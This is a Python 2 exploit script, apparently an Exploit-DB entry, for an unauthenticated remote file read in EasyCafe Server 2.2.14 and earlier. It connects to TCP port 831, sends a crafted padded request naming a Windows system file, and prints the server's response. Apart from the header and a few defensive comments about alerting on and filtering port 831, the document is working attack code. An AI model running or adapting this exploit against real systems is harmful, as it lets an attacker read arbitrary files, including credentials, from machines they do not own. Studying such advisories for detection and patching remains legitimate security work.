#!/usr/bin/python -w
# Title : EasyCafe Server <= 2.2.14 Remote File Read
# Date : 25/12/2015
# Author : R-73eN
# Tested on : Windows 7 Ultimate
# Software Link : http://www.tinasoft.com/easycafe/
# Download Link: http://www.tinasoft.com/Download/easysetup.exe
# Vulnerable Versions : EasyCafe Server <= 2.2.14
# EasyCafe Server has a feature to upload a file from the server to a client.
# The request works as follows: EasyCafe Server sends a UDP request to the client naming the file it wants to upload,
# then the client receives the packet, connects to the server on port 831, sends the directory of the file and receives it.
# The problem is that a remote attacker can connect to port 831 and retrieve a file, because the server doesn't validate the request
# and does not check whether it has sent the UDP request, which gives us full read access to the system.
#
# EDB Note: Code may need some adjusting
import socket
# Banner: ASCII-art logo printed once at start-up. Purely cosmetic; it plays
# no part in the request sent to the server.
# (Python 2 script: `print` is used as a statement throughout.)
banner = "".join([
    "_________ __\n",
    " |_ _|_ __/ _| ___/ ___| ___ _ __/ \| |\n",
    "| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | |\n",
    "| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ \n",
    " |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____|\n\n",
])
print banner
# Proof of concept for the unauthenticated file read described in the header.
# Python 2 only (print statements, str.encode('hex')).
#
# What the script demonstrates: the file-transfer listener on TCP 831 answers
# a file request from any peer. Per the advisory text above, the server never
# checks that it announced the transfer over UDP beforehand.
#
# Defensive reading: a TCP connection to port 831 from a host the server did
# not just notify is the anomaly to alert on, and filtering port 831 so that
# only known client machines can reach it limits exposure.

IP = "192.168.43.36"  # Target IP (the author's lab address)
PORT = 831  # TCP port the client normally connects back to
file_to_read = "C:\\Windows\\System32\\drivers\\etc\\hosts"  # File to read

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((IP, PORT))

# Request layout, as built below: one 0x43 byte, the file path, NUL padding,
# then a fixed 5-byte trailer -- 261 bytes in total. The script does not say
# what the 0x43 byte or the trailer mean to the server.
request_len = 261
trailer = "\x01\x00\x00\x00\x01"
padding_byte = "\x00"
request_path = "\x43" + file_to_read

# The path is hex-encoded and decoded again; for a Python 2 byte string this
# round trip returns the same bytes.
hex_value = ''.join(ch.encode('hex') for ch in request_path)
pad_count = request_len - len(trailer) - len(request_path)
payload = hex_value.decode("hex") + padding_byte * pad_count + trailer

sock.send(payload)
# settimeout(0) puts the socket into non-blocking mode for the reads below.
sock.settimeout(0)
print "[+] Request Send Waiting for Response . . . [+]"
try:
    # The first 261 bytes are treated as a header and are not printed.
    chunk = sock.recv(261)
    # Read and print 2048-byte chunks until recv returns an empty string.
    while chunk:
        chunk = sock.recv(2048)
        print chunk
except Exception:
    # Any error, socket errors included, is swallowed here; only the author's
    # URL is printed.
    print "[+] https://www.infogen.al/ [+]"
finally:
    sock.close()